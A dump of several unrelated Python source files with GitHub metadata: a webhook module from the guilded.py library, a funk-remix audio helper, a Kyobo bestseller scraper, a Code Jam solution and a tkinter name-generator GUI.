ContextVar[AsyncWebhookAdapter] = ContextVar('async_webhook_context', default=AsyncWebhookAdapter())\n\n\nclass _WebhookState:\n __slots__ = (\n '_parent',\n '_webhook',\n 'userbot',\n )\n\n def __init__(self, webhook: Any, parent: Optional[Union[HTTPClient, _WebhookState]], userbot: bool = None):\n self._webhook: Any = webhook\n self.userbot: bool = userbot\n\n self._parent: Optional[HTTPClient]\n if isinstance(parent, _WebhookState):\n self._parent = None\n else:\n self._parent = parent\n\n if self._parent is not None:\n self.userbot = parent.userbot\n\n def _get_team(self, team_id: str):\n if self._parent is not None:\n return self._parent._get_team(team_id)\n return None\n\n def _get_team_channel(self, team_id: str, channel_id: str):\n if self._parent is not None:\n return self._parent._get_team_channel(team_id, channel_id)\n return None\n\n def _get_emoji(self, emoji_id: str):\n if self._parent is not None:\n return self._parent._get_emoji(emoji_id)\n return None\n\n def _get_team_member(self, team_id: str, user_id: str):\n if self._parent is not None:\n return self._parent._get_team_member(team_id, user_id)\n return None\n\n def _get_user(self, user_id: str):\n if self._parent is not None:\n return self._parent._get_user(user_id)\n return None\n\n def store_user(self, data):\n if self._parent is not None:\n return self._parent.store_user(data)\n # state parameter is artificial\n return User(state=self, data=data) # type: ignore\n\n def create_user(self, **data):\n # state parameter is artificial\n return User(state=self, **data) # type: ignore\n\n def create_member(self, **data):\n return Member(state=self, **data)\n\n def __getattr__(self, attr):\n if self._parent is not None:\n return getattr(self._parent, attr)\n\n raise AttributeError(f'PartialWebhookState does not support {attr!r}.')\n\n\nclass WebhookMessage(ChatMessage):\n \"\"\"Represents a message sent from your webhook.\n\n This allows you to delete a message sent by your webhook, although the\n parent webhook requires authentication information.\n\n This inherits from :class:`.ChatMessage` with changes to\n :meth:`delete` to work.\n \"\"\"\n\n _state: _WebhookState\n\n async def edit(self, *args, **kwargs):\n raise AttributeError('WebhookMessages cannot be edited.')\n\n async def delete(self, *, delay: Optional[float] = None) -> None:\n \"\"\"|coro|\n\n Deletes the message.\n\n Parameters\n -----------\n delay: Optional[:class:`float`]\n If provided, the number of seconds to wait before deleting the message.\n The waiting is done in the background and deletion failures are ignored.\n\n Raises\n ------\n Forbidden\n You do not have proper permissions to delete the message.\n NotFound\n The message was deleted already.\n HTTPException\n Deleting the message failed.\n ValueError\n This instance of a webhook does not have authentication info associated with it.\n \"\"\"\n\n if delay is not None:\n\n async def inner_call(delay: float = delay):\n await asyncio.sleep(delay)\n try:\n await self._state._webhook.delete_message(self.channel_id, self.id)\n except HTTPException:\n pass\n\n asyncio.create_task(inner_call())\n else:\n await self._state.delete_message(self.channel_id, self.id)\n\n\nclass BaseWebhook:\n __slots__: Tuple[str, ...] = (\n 'auth_token',\n '_state',\n 'id',\n 'channel_id',\n 'team_id',\n 'name',\n '_icon_url',\n 'token',\n 'created_by_id',\n 'created_at',\n 'deleted_at',\n )\n\n def __init__(self, data: WebhookPayload, auth_token: Optional[str] = None, state: Optional[HTTPClient] = None, userbot: bool = None):\n self.auth_token: Optional[str] = auth_token\n if userbot is None and state is not None:\n userbot = state.userbot\n\n self._state: Union[HTTPClient, _WebhookState] = state or _WebhookState(self, parent=state, userbot=userbot)\n self._update(data.get('webhook', data))\n\n def __repr__(self):\n return f'<{self.__class__.__name__} id={self.id!r} team={self.team!r}>'\n\n def _update(self, data: WebhookPayload):\n self.id: str = data['id']\n self.channel_id: Optional[str] = data.get('channelId')\n self.team_id: Optional[str] = data.get('teamId', data.get('serverId'))\n self.name: Optional[str] = data.get('name')\n self._icon_url = data.get('iconUrl')\n self.token: Optional[str] = data.get('token')\n self.created_by_id: Optional[str] = data.get('createdBy')\n self.created_at: Optional[datetime.datetime] = ISO8601(data.get('createdAt'))\n self.deleted_at: Optional[datetime.datetime] = ISO8601(data.get('deletedAt'))\n\n def _update_details(self, data: WebhookPayload):\n # This is specifically for the data received for Get Webhook Details\n self.created_at = ISO8601(data.get('createdAt'))\n self.created_by_id = data.get('createdBy')\n self.token = data.get('token')\n\n def is_partial(self) -> bool:\n \"\"\":class:`bool`: Whether the webhook is a \"partial\" webhook.\"\"\"\n return self.channel_id is None\n\n def is_authenticated(self) -> bool:\n \"\"\":class:`bool`: Whether the webhook has non-webhook authentication information associated with it.\n\n If this is not ``True``, you will not be able to manage messages sent\n by this webhook, nor delete or edit the webhook itself.\n \"\"\"\n return self.auth_token is not None\n\n @property\n def team(self) -> Optional[Team]:\n \"\"\"Optional[:class:`.Team`]: The team this webhook belongs to.\n\n If this is a partial webhook, then this will always return ``None``.\n \"\"\"\n return self._state and self._state._get_team(self.team_id)\n\n @property\n def server(self) -> Optional[Team]:\n \"\"\"Optional[:class:`.Team`]: This is an alias of :attr:`.team`.\"\"\"\n return self.team\n\n @property\n def guild(self) -> Optional[Team]:\n \"\"\"|dpyattr|\n\n This is an alias of :attr:`.team`.\n \"\"\"\n return self.team\n\n @property\n def channel(self) -> Optional[Union[ChatChannel, ListChannel]]:\n \"\"\"Optional[Union[:class:`.ChatChannel`, :class:`.ListChannel`]]: The channel this webhook belongs to.\n\n If this is a partial webhook, then this will always return ``None``.\n \"\"\"\n team = self.team\n return team and team.get_channel(self.channel_id) # type: ignore\n\n @property\n def avatar(self) -> Optional[Asset]:\n \"\"\"Optional[:class:`Asset`]: Returns an :class:`Asset` for the avatar the webhook has.\n\n If the webhook does not have an uploaded avatar, ``None`` is returned.\n If you want the avatar that the webhook displays, consider :attr:`display_avatar` instead.\n \"\"\"\n if self._icon_url is not None:\n return Asset._from_user_avatar(self._state, self._icon_url)\n return None\n\n @property\n def default_avatar(self) -> Asset:\n \"\"\":class:`Asset`: Returns the default avatar.\n This is always `'Gil' <https://img.guildedcdn.com/asset/Default/Gil-md.png>`_.\"\"\"\n return Asset._from_default_asset(self._state, 'Gil')\n\n @property\n def display_avatar(self) -> Asset:\n \"\"\":class:`Asset`: Returns the webhook's display avatar.\n\n This is either webhook's default avatar or uploaded avatar.\n \"\"\"\n return self.avatar or self.default_avatar\n\n\nclass Webhook(BaseWebhook):\n \"\"\"Represents an asynchronous webhook.\n\n There are two main ways to use Webhooks. The first is through the ones\n received by the library such as :meth:`.Team.webhooks` and\n :meth:`.ChatChannel.webhooks`. The ones received by the library will\n automatically be bound using the library's internal HTTP session.\n\n The second form involves creating a webhook object manually using the\n :meth:`~.Webhook.from_url` or :meth:`~.Webhook.partial` classmethods.\n\n For example, creating a webhook from a URL and using :doc:`aiohttp <aio:index>`:\n\n .. code-block:: python3\n\n from guilded import Webhook\n import aiohttp\n\n async def foo():\n async with aiohttp.ClientSession() as session:\n webhook = Webhook.from_url('url-here', session=session)\n await webhook.send('Hello World')\n\n .. container:: operations\n\n .. describe:: x == y\n\n Checks if two webhooks are equal.\n\n .. describe:: x != y\n\n Checks if two webhooks are not equal.\n\n Attributes\n ------------\n id: :class:`str`\n The webhook's ID\n token: Optional[:class:`str`]\n The authentication token of the webhook. If this is ``None``\n then the webhook cannot be used to send messages.\n team_id: Optional[:class:`str`]\n The team ID this webhook is for.\n channel_id: Optional[:class:`str`]\n The channel ID this webhook is for.\n name: Optional[:class:`str`]\n The webhook's name.\n \"\"\"\n\n __slots__: Tuple[str, ...] = ('session',)\n\n def __init__(self, data, session: aiohttp.ClientSession, auth_token: Optional[str] = None, state: Optional[HTTPClient] = None, userbot: Optional[bool] = None):\n super().__init__(data, auth_token, state, userbot)\n self.session = session\n\n @property\n def url(self) -> str:\n \"\"\":class:`str`: Returns the webhook's url.\"\"\"\n return f'https://media.guilded.gg/webhooks/{self.id}/{self.token}'\n\n @classmethod\n def partial(\n cls,\n id: str,\n token: str,\n *,\n session: aiohttp.ClientSession,\n auth_token: Optional[str] = None,\n bot: Optional[bool] = True\n ) -> Webhook:\n \"\"\"Creates a partial :class:`Webhook`.\n\n Parameters\n -----------\n id: :class:`str`\n The ID of the webhook.\n token: :class:`str`\n The authentication token of the webhook.\n session: :class:`aiohttp.ClientSession`\n The session to use to send requests with. Note\n that the library does not manage the session and\n will not close it.\n auth_token: Optional[:class:`str`]\n The bot authentication token for authenticated requests\n involving the webhook.\n For user authentication, this should be a ``guilded_mid`` cookie.\n bot: Optional[:class:`bool`]\n Whether ``auth_token`` represents a bot account.\n\n Returns\n --------\n :class:`Webhook`\n A partial :class:`Webhook`.\n A partial webhook is just a webhook object with an ID and a token.\n \"\"\"\n data = {\n 'id': id,\n 'token': token,\n }\n\n return cls(data, session, auth_token=auth_token, userbot=not bot)\n\n @classmethod\n def from_url(\n cls,\n url: str,\n *,\n session: aiohttp.ClientSession,\n auth_token: Optional[str] = None,\n bot: Optional[bool] = True\n ) -> Webhook:\n \"\"\"Creates a partial :class:`Webhook` from a webhook URL.\n\n Parameters\n ------------\n url: :class:`str`\n The URL of the webhook.\n session: :class:`aiohttp.ClientSession`\n The session to use to send requests with. Note\n that the library does not manage the session and\n will not close it.\n auth_token: Optional[:class:`str`]\n The bot authentication token for authenticated requests\n involving the webhook.\n For user authentication, this should be a ``guilded_mid`` cookie.\n bot: Optional[:class:`bool`]\n Whether ``auth_token`` represents a bot account.\n\n Returns\n --------\n :class:`Webhook`\n A partial :class:`Webhook`.\n A partial webhook is just a webhook object with an ID and a token.\n\n Raises\n -------\n ValueError\n The URL is invalid.\n \"\"\"\n # media.guilded.gg/webhooks & www.guilded.gg/api/webhooks are both valid,\n # but only the former will be generated by the client.\n # [A-Za-z0-9\\.\\-\\_] may be needlessly broad for tokens.\n m = re.search(r'(?:media\\.guilded\\.gg|guilded\\.gg\\/api)\\/webhooks/(?P<id>[0-9a-fA-F]{8}\\b-[0-9a-fA-F]{4}\\b-[0-9a-fA-F]{4}\\b-[0-9a-fA-F]{4}\\b-[0-9a-fA-F]{12})/(?P<token>[A-Za-z0-9\\.\\-\\_]{80,90})', url)\n if m is None:\n raise ValueError('Invalid webhook URL given.')\n\n data: Dict[str, Any] = m.groupdict()\n return cls(data, session, auth_token=auth_token, userbot=not bot) # type: ignore\n\n @classmethod\n def from_state(cls, data: WebhookPayload, state: HTTPClient) -> Webhook:\n session = state.session\n token = state.cookie if state.userbot else state.token\n return cls(data, session=session, state=state, auth_token=token)\n\n async def fetch(self, *, team: Optional[Team] = None) -> Webhook:\n \"\"\"|coro|\n\n Fetches the current webhook.\n\n This could be used to get a full webhook from a partial webhook.\n\n This requires an authenticated webhook.\n\n Parameters\n -----------\n team: Optional[:class:`.Team`]\n The team that this webhook exists in.\n This is only required if :attr:`.team_id` is ``None``.\n\n Returns\n --------\n :class:`Webhook`\n The fetched webhook.\n\n Raises\n -------\n HTTPException\n Could not fetch the webhook.\n NotFound\n Could not find the webhook by this ID.\n ValueError\n This instance of a webhook does not have authentication info associated with it,\n could not find the webhook by this ID (the client is a user account),\n or no team was provided but it is required.\n \"\"\"\n\n if not self.auth_token:\n raise ValueError('This instance of a webhook does not have authentication info associated with it.')\n if not team and not self.team_id:\n raise ValueError('team must be provided if this instance of a webhook\\'s team_id is None.')\n\n adapter = async_context.get()\n data = await adapter.get_webhook(self.team_id or team.id, self.id, auth_token=self.auth_token, userbot=self._state.userbot, session=self.session)\n if self._state.userbot:\n data = find(lambda d: d['id'] == self.id, data['webhooks'])\n if data is None:\n raise ValueError(f'Could not find the webhook by the ID {self.id}')\n\n return Webhook(data, self.session, auth_token=self.auth_token, state=self._state)\n\n async def fill_details(self, *, team: Optional[Team] = None) -> Webhook:\n \"\"\"|coro|\n\n |onlyuserbot|\n\n Fills the details for the current webhook instance.\n\n This method is mainly useful for filling in :attr:`.token` if it is not already present.\n It is separate from :meth:`.fetch` in that :meth:`.fetch` does not provide :attr:`.token` if the client is a user account.\n Similarly, this method does not provide many of the details that :meth:`.fetch` does.\n\n This requires an authenticated webhook.\n\n Parameters\n -----------\n team: Optional[:class:`.Team`]\n The team that this webhook exists in.\n This is only required if :attr:`.team_id` is ``None``.\n\n Returns\n --------\n :class:`Webhook`\n The current webhook instance with details filled in.\n\n Raises\n -------\n HTTPException\n Could not fill the webhook's details.\n ValueError\n This instance of a webhook does not have authentication info associated with it,\n could not find the webhook by this ID,\n or no team was provided but it is required.\n \"\"\"\n\n if not self.auth_token:\n raise ValueError('This instance of a webhook does not have authentication info associated with it.')\n if not team and not self.team_id:\n raise ValueError('team must be provided if this instance of a webhook\\'s team_id is None.')\n\n adapter = async_context.get()\n data = await adapter.get_webhook_details(self.team_id or team.id, self.id, auth_token=self.auth_token, session=self.session)\n if not data:\n raise ValueError(f'Could not find the webhook by the ID {self.id}')\n\n self._update_details(data[self.id])\n return self\n\n async def delete(self, *, team: Optional[Team] = None) -> Optional[datetime.datetime]:\n \"\"\"|coro|\n\n Deletes this webhook.\n\n This requires an authenticated webhook.\n\n Parameters\n -----------\n team: Optional[:class:`.Team`]\n The team that this webhook exists in.\n This is only required if :attr:`.team_id` is ``None`` and the client is a bot account.\n\n Returns\n --------\n Optional[:class:`datetime.datetime`]\n If the client is a user account, the :class:`datetime.datetime`\n when this webhook was deleted, else ``None``.\n\n Raises\n -------\n HTTPException\n Deleting the webhook failed.\n NotFound\n This webhook does not exist.\n Forbidden\n You do not have permissions to delete this webhook.\n ValueError\n This instance of a webhook does not have authentication info associated with it\n or no team was provided but it is required.\n \"\"\"\n if self.auth_token is None:\n raise ValueError('This instance of a webhook does not have authentication info associated with it.')\n if not team and not self.team_id and not self._state.userbot:\n raise ValueError('team must be provided if this instance of a webhook\\'s team_id is None.')\n\n adapter = async_context.get()\n data = await adapter.delete_webhook(self.team_id or team.id, self.id, auth_token=self.auth_token, userbot=self._state.userbot, session=self.session)\n if self._state.userbot:\n deleted_at = ISO8601(data.get('deletedAt'))\n self.deleted_at = deleted_at\n return deleted_at\n\n async def edit(\n self,\n *,\n name: Optional[str] = MISSING,\n avatar: Optional[Union[bytes, File]] = MISSING,\n channel: Optional[Union[ChatChannel, ListChannel]] = None,\n team: Optional[Team] = None,\n ) -> Webhook:\n \"\"\"|coro|\n\n Edits this webhook.\n\n This requires an authenticated webhook.\n\n Parameters\n ------------\n name: Optional[:class:`str`]\n The webhook's new name.\n channel: Union[:class:`ChatChannel`, :class:`ListChannel`]\n The channel to move the webhook to.\n avatar: Optional[Union[:class:`bytes`, :class:`File`]]\n A :term:`py:bytes-like object` or :class:`File` for the webhook's new avatar.\n If the client is a bot user, providing this does nothing.\n team: Optional[:class:`.Team`]\n The team that this webhook exists in.\n This is only required if :attr:`.team_id` is ``None`` and the client is a bot account.\n\n Returns\n --------\n :class:`.Webhook`\n The updated webhook.\n\n Raises\n -------\n HTTPException\n Editing the webhook failed.\n NotFound\n This webhook does not exist.\n ValueError\n This instance of a webhook does not have authentication info associated with it\n or no team was provided but it is required.\n \"\"\"\n if self.auth_token is None:\n raise ValueError('This instance of a webhook does not have authentication info associated with it.')\n if not team and not self.team_id and not self._state.userbot:\n raise ValueError('team must be provided if this instance of a webhook\\'s team_id is None.')\n\n payload = {}\n if name is not MISSING:\n payload['name'] = str(name) if name is not None else None\n\n if channel is not None:\n payload['channelId'] = channel.id\n\n if avatar is not MISSING and self._state.userbot:\n if isinstance(avatar, bytes):\n avatar = File(io.BytesIO(avatar), file_type=FileType.image)\n elif not isinstance(avatar, File):\n raise TypeError(f'avatar must be type bytes or File, not {avatar.__class__.__name__}')\n\n avatar.set_media_type(MediaType.user_avatar)\n await avatar._upload()\n payload['iconUrl'] = avatar.url\n\n adapter = async_context.get()\n data = await adapter.update_webhook(\n self.team_id or team.id,\n self.id,\n auth_token=self.auth_token,\n userbot=self._state.userbot,\n payload=payload,\n session=self.session\n )\n\n return Webhook(data=data, session=self.session, auth_token=self.auth_token, userbot=self._state.userbot, state=self._state)\n\n async def move(self, to: Union[ChatChannel, ListChannel]):\n \"\"\"|coro|\n\n Moves this webhook to another channel.\n\n Parameters\n -----------\n to: Union[:class:`.ChatChannel`, :class:`.ListChannel`]\n The channel to move the webhook to.\n\n Returns\n --------\n :class:`.Webhook`\n The updated webhook.\n\n Raises\n -------\n HTTPException\n Editing the webhook failed.\n NotFound\n This webhook does not exist.\n ValueError\n This instance of a webhook does not have authentication info associated with it.\n \"\"\"\n return await self.edit(channel=to, team=to.team)\n\n def _create_message(self, data):\n state = _WebhookState(self, parent=self._state)\n # state may be artificial (unlikely at this point...)\n channel = self.channel or ChatChannel(state=self._state, data={'id': data['channelId']}, group=None) # type: ignore\n # state is artificial\n return WebhookMessage(data=data, state=state, channel=channel, webhook=self) # type: ignore\n\n async def send(\n self,\n content: str = MISSING,\n *,\n embed: Embed = MISSING,\n embeds: Sequence[Embed] = MISSING,\n file: File = MISSING,\n files: Sequence[File] = MISSING,\n ) -> WebhookMessage:\n \"\"\"|coro|\n\n Sends a message using this webhook.\n\n The content must be a type that can convert to a string through ``str(content)``.\n\n To upload a single file, the ``file`` parameter should be used with a\n single :class:`File` object.\n\n If the ``embed`` parameter is provided, it must be of type :class:`Embed` and\n it must be a rich embed type. You cannot mix the ``embed`` parameter with the\n ``embeds`` parameter, which must be a :class:`list` of :class:`Embed` objects to send.\n\n Parameters\n ------------\n content: :class:`str`\n The content of the message to send.\n file: :class:`File`\n The file to upload. This cannot be mixed with ``files`` parameter.\n files: List[:class:`File`]\n A list of files to send with the content. This cannot be mixed with the\n ``file`` parameter.\n embed: :class:`Embed`\n The rich embed for the content to send. This cannot be mixed with\n ``embeds`` parameter.\n embeds: List[:class:`Embed`]\n A list of embeds to send with the content. Maximum of 10. This cannot\n be mixed with the ``embed`` parameter.\n\n Returns\n ---------\n :class:`WebhookMessage`\n The message that was sent.\n\n Raises\n --------\n HTTPException\n Sending the message failed.\n NotFound\n This webhook was not found.\n Forbidden\n The token for the webhook is incorrect.\n TypeError\n You specified both ``embed`` and ``embeds`` or ``file`` and ``files``.\n ValueError\n The length of ``embeds`` was invalid or there was no token\n associated with this webhook.\n \"\"\"\n\n if self.token is None:\n raise ValueError('This instance of a webhook does not a token associated with it.')\n\n if content is None:\n content = MISSING\n\n params = handle_message_parameters(\n content=content,\n file=file,\n files=files,\n embed=embed,\n embeds=embeds,\n )\n adapter = async_context.get()\n\n data = await adapter.execute_webhook(\n self.id,\n self.token,\n session=self.session,\n payload=params.payload,\n multipart=params.multipart,\n files=params.files,\n )\n\n message = self._create_message(data)\n self.team_id = message.team_id\n\n return message\n\n async def fetch_message(self, id: str, *, channel: Optional[ChatChannel] = None) -> WebhookMessage:\n \"\"\"|coro|\n\n Retrieves a single :class:`.WebhookMessage` sent by this webhook.\n\n This requires an authenticated webhook.\n\n Parameters\n ------------\n id: :class:`str`\n The message ID to look for.\n channel: Optional[:class:`.ChatChannel`]\n The channel that this message exists in.\n This is only required if :attr:`.channel_id` is ``None``.\n\n Returns\n --------\n :class:`.WebhookMessage`\n The message that was asked for.\n\n Raises\n --------\n NotFound\n The specified message was not found.\n Forbidden\n You do not have the permissions required to get a message.\n HTTPException\n Retrieving the message failed.\n ValueError\n This instance of a webhook does not have authentication info associated with it\n or no channel was provided but it is required.\n \"\"\"\n\n if not self.auth_token:\n raise ValueError('This instance of a webhook does not have authentication info associated with it.')\n if self.channel_id is None or channel is None:\n raise ValueError('channel must be provided if this instance of a webhook\\'s channel_id is None.')\n\n channel_id = channel.id if channel is not None else self.channel_id\n\n adapter = async_context.get()\n data = await adapter.get_channel_message(\n self.id,\n channel_id,\n id,\n auth_token=self.auth_token,\n userbot=self._state.userbot,\n session=self.session,\n )\n if self._state.userbot:\n data = data['metadata']['message']\n\n return self._create_message(data)\n\n async def delete_message(self, id: str, *, channel: Optional[ChatChannel] = None) -> None:\n \"\"\"|coro|\n\n Deletes a message sent by this webhook.\n\n This is a lower level interface to :meth:`.WebhookMessage.delete` in case\n you only have an ID.\n\n This requires an authenticated webhook.\n\n Parameters\n ------------\n id: :class:`str`\n The message ID to delete.\n channel: Optional[:class:`.ChatChannel`]\n The channel that this message exists in.\n This is only required if :attr:`.channel_id` is ``None``.\n\n Raises\n -------\n HTTPException\n Deleting the message failed.\n Forbidden\n Deleted a message that is not yours.\n ValueError\n This instance of a webhook does not have authentication info associated with it\n or no channel was provided but it is required.\n \"\"\"\n\n if self.auth_token is None:\n raise ValueError('This instance of a webhook does not have authentication info associated with it.')\n if self.channel_id is None or channel is None:\n raise ValueError('channel must be provided if this instance of a webhook\\'s channel_id is None.')\n\n channel_id = channel.id if channel is not None else self.channel_id\n\n adapter = async_context.get()\n await adapter.delete_channel_message(\n self.id,\n channel_id,\n id,\n auth_token=self.auth_token,\n userbot=self._state.userbot,\n session=self.session,\n )\n\n async def edit_message(self, *args, **kwargs):\n raise AttributeError('Webhook messages cannot be edited.')\n","repo_name":"cosmogonies/VirtualRoleplaying","sub_path":".local/lib/python3.9/site-packages/guilded/webhook/async_.py","file_name":"async_.py","file_ext":"py","file_size_in_byte":37317,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"9719074272","text":"from pydub import AudioSegment, effects\nfrom .errors import append_error\nimport youtube_dl\nimport librosa\nimport os\n\ndef restrict_musics_number(musics, musics_number):\n musics_number = musics_number if(musics_number <= len(musics)) else len(musics)\n musics = musics[:musics_number] if(musics_number <= len(musics)) else musics\n return musics, musics_number \n\ndef download_by_youtube_dl(name, link):\n try:\n ydl_opts = {\n 'format': 'bestaudio/best',\n 'outtmpl': f'{name}.wav',\n 'postprocessors': [{\n 'key': 'FFmpegExtractAudio',\n 'preferredcodec': 'wav',\n 'preferredquality': '192',\n }],\n }\n with youtube_dl.YoutubeDL(ydl_opts) as ydl:\n ydl.download([link])\n return ydl_opts \n except Exception:\n append_error('youtube_download', name)\n\ndef download_process(musics_number, musics, musics_directory):\n if len(os.listdir(musics_directory)) < musics_number:\n ydl_opts = []\n i = -1\n while(len(os.listdir(musics_directory)) < musics_number):\n i+=1\n name, link = musics[i].get_name(), musics[i].get_link()\n if f'{name}.wav' not in os.listdir(musics_directory):\n try:\n ydl_opts.append(download_by_youtube_dl(name, link))\n except Exception:\n append_error('Download', name)\n\ndef load_audio_segment(file_name, name):\n try:\n return AudioSegment.from_file(file_name)\n except Exception:\n append_error(f'load_audio_segment there is not {file_name} in the {os.getcwd()} directory')\n raise Exception\n\ndef load_librosa(file_name, name):\n try:\n original_audio_time_series, original_sampling_rate_of_audio_times_series = librosa.load(file_name)\n return original_audio_time_series, original_sampling_rate_of_audio_times_series\n except Exception:\n append_error('load_librosa', name)\n raise Exception\n\ndef beat_and_tempo_by_librosa(original_audio_time_series, original_sr, name):\n try:\n return librosa.beat.beat_track(y=original_audio_time_series, sr=original_sr)\n except Exception:\n append_error('tempo, beats = librosa.beat.beat_track()', name)\n raise Exception\n\ndef calc_tempo_by_alvraw(tempo):\n tempo = tempo * 2 if (tempo < 100) else tempo\n alhpa_tempo = tempo % 5,\n playback_bpm_semint = tempo-alhpa_tempo\n playback_bpm = int(playback_bpm_semint)\n return tempo, playback_bpm\n\ndef funk_by_bpm(bpm):\n if bpm<=160 and bpm>=100:\n return f'../funks/funk{bpm-bpm%5}.wav'\n elif bpm >160:\n return f'../funks/funk{160}.wav'\n else:\n return f'../funks/funk{100}.wav'\n\ndef playback_by_audio_segment(file_name, name):\n try:\n return AudioSegment.from_file(file_name)\n except Exception:\n append_error('playback_by_audio_segment', name)\n raise Exception\n\ndef slice_silence(original_audio_time_series, original_sampling_rate_of_audio_times_series, original, name):\n try:\n oenv = librosa.onset.onset_detect(y=original_audio_time_series, sr=original_sampling_rate_of_audio_times_series, units='time')\n duration_in_milliseconds = len(original)\n duration_sliced = duration_in_milliseconds - (oenv[0]*1000)\n sliced = original[-duration_sliced:]\n return sliced\n except Exception:\n append_error('slice_silence', name)\n raise Exception\n\ndef bpm_sync(sync_bpm_1, sync_bpm_2, sync_input, name):\n try:\n alfa_sync = (sync_bpm_1 / sync_bpm_2)\n playback_speeded = effects.speedup(sync_input, alfa_sync)\n playback_speeded.export('speeded.wav', format='wav')\n playback_speeded = AudioSegment.from_file('speeded.wav')\n return playback_speeded\n except:\n append_error('bpm_sync', name)\n raise Exception\n\ndef apply(original, versao, name):\n try:\n final = original.overlay(versao, loop=True)\n return final\n except:\n append_error('apply', name)\n raise Exception\n\ndef export_wav(music, youmix_musics_directory, current_directory, name, music_name):\n try:\n os.chdir(youmix_musics_directory)\n music.export(music_name, format='wav')\n os.chdir(current_directory)\n print(f'\\nMusic {name} successfully converted!')\n except Exception:\n append_error('export_wav', name)\n raise Exception","repo_name":"decarvalho33/fun-k","sub_path":"musica_do_seu_jeito-main/youmix/resources/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":4454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"36960610182","text":"import time as t\nfrom selenium import webdriver\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom selenium.webdriver.common.by import By\nfrom bs4 import BeautifulSoup\nfrom datetime import datetime\nimport codecs\nd = datetime.today()\n\nfile_path = f'c:/Work/교보 온라인 베스트셀러 1~50위_{d.year}_{d.month}_{d.day}.html'\n\nwith codecs.open(file_path,mode='w',encoding='utf-8') as f:\n options = webdriver.ChromeOptions()\n options.add_experimental_option('detach',True)\n\n service = webdriver.ChromeService(ChromeDriverManager().install())\n driver = webdriver.Chrome(service=service ,options=options)\n\n driver.get('https://www.kyobobook.co.kr/')\n\n t.sleep(2)\n btn_best_seller = driver.find_element(By.XPATH,'//*[@id=\"welcome_header_wrap\"]/div[3]/nav/ul[1]/li[3]/a')\n btn_best_seller.click()\n t.sleep(2)\n f.write('<oi>')\n for n in range(2,5):\n src = driver.page_source\n\n soup = BeautifulSoup(src, 'html.parser')\n div_list = soup.find_all('li',class_='prod_item')\n for item in div_list:\n f.write('<li style=\"display:flex\"}>')\n f.write('<div>')\n f.write(f'{item.find(\"a\",class_=\"prod_link\")}')\n f.write('</div>')\n f.write('<div>')\n f.write(f'<div>순위: {item.find(\"div\",class_=\"prod_rank\").text}위 </div>\\n')\n f.write(f'<div>책 제목: {item.find(\"span\",class_=\"prod_name\").text} </div>\\n')\n f.write(f'<div>저자: {item.find(\"span\",class_=\"prod_author\").text.split(\"· \")[0]} </div>\\n')\n f.write(f'<div>출판사: {item.find(\"span\",class_=\"prod_author\").text.split(\"· \")[1]} </div>\\n')\n f.write(f'<div>출판일: {item.find(\"span\",class_=\"prod_author\").text.split(\"· \")[2]} </div>\\n')\n f.write(f'<div>가격: {item.find(\"div\",class_=\"prod_price\").text.split(\"|\")[0]} </div>\\n')\n f.write('</div>')\n f.write('</li>')\n driver.find_element(By.XPATH,f'//*[@id=\"tabRoot\"]/div[2]/div[1]/div/a[{n}]').click()\n t.sleep(2)\n f.write('</oi>')","repo_name":"jaemin-s/python_basic","sub_path":"web_crawling/kyobo_url.py","file_name":"kyobo_url.py","file_ext":"py","file_size_in_byte":2071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"71049049851","text":"from math import exp,log\nfrom scipy.stats import spearmanr\nimport sys\n\ndef solve_one(prob_num):\n a = [\"\"]*100\n for i in range(100):\n a[i] = input()\n\n def est_s(i):\n r = a[i].count(\"1\")/10000\n lhs = exp(6*(r-1))\n exp_minus_s = (1-lhs)/(exp(3)*lhs-exp(-3))\n return -log(exp_minus_s)\n\n s = [est_s(i) for i in range(100)]\n\n def est_q(j):\n lb=-3\n ub=3\n mean = sum([1 for i in range(100) if a[i][j]==\"1\"])\n while abs(ub-lb)>0.01:\n mid=(ub-lb)/2+lb\n if sum([1/(1+exp(mid-s[i])) for i in range(100)]) < mean:\n ub=mid\n else:\n lb=mid\n return lb\n\n q = [est_q(j) for j in range(10000)]\n\n corrs = [spearmanr([-int(x) for x in a[i]],q) for i in range(100)]\n minent = min(corrs)\n ret = corrs.index(minent)+1\n\n print(f\"Case #{prob_num}: {ret}\")\n\nif __name__==\"__main__\":\n t = int(input())\n p = int(input())\n for i in range(t):\n solve_one(i+1)\n\n\n\n\n\n","repo_name":"ayanamizuta/cpro","sub_path":"codejam/2021/first/e.py","file_name":"e.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"1322104830","text":"import tkinter as tk\nimport generator as gen\n\nfrom tkinter import ttk\n\nclass App(tk.Frame):\n\tdef __init__(self, master=None):\n\t\tsuper().__init__(master)\n\t\tself.pack()\n\n\t\tself.create_widgets()\n\t\n\tdef create_widgets(self):\n\t\tself.name_list = tk.Listbox(self, yscrollcommand=set(), width=30)\n\t\tself.syl_name_list = tk.Listbox(self, yscrollcommand=set(), width=30)\n\t\tconsonant_box = tk.Text(self, wrap=\"word\", yscrollcommand=set(), width=30)\n\t\tvowel_box = tk.Text(self, wrap=\"word\", yscrollcommand=set(), width=30)\n\t\tgen_button = tk.Button(self, text=\"Generate Name\", command=self.generate_name)\n\n\t\t#Create the consonant box\n\t\tconsonant_box.insert(1.0, str(gen.CONSONANTS)[1:-1])\n\t\tconsonant_box.insert(2.0, str(gen.CONSONANTS_DIGRAPHS_INITIAL)[1:-1])\n\t\tconsonant_box.insert(3.0, str(gen.CONSONANTS_DIGRAPHS_FINAL)[1:-1])\n\t\tconsonant_box.grid(column=0, row=0)\n\n\t\t#Create the vowel list box\n\t\tvowel_box.insert(1.0, str(gen.VOWELS)[1:-1], str(gen.VOWEL_DIGRAPHS)[1:-1])\n\t\tvowel_box.grid(column=1, row=0)\n\n\t\t#Create the \"Generate Name\" button\n\t\tgen_button.grid(column=0, row=1, columnspan=2)\n\n\t\t#Create the name list box\n\t\tself.name_list.grid(column=0, row=2)\n\n\t\t#Create a name list box with syllable spacing\n\t\tself.syl_name_list.grid(column=1, row=2)\n\t\n\tdef generate_name(self):\n\t\tnames = []\n\t\tnames_spaced = 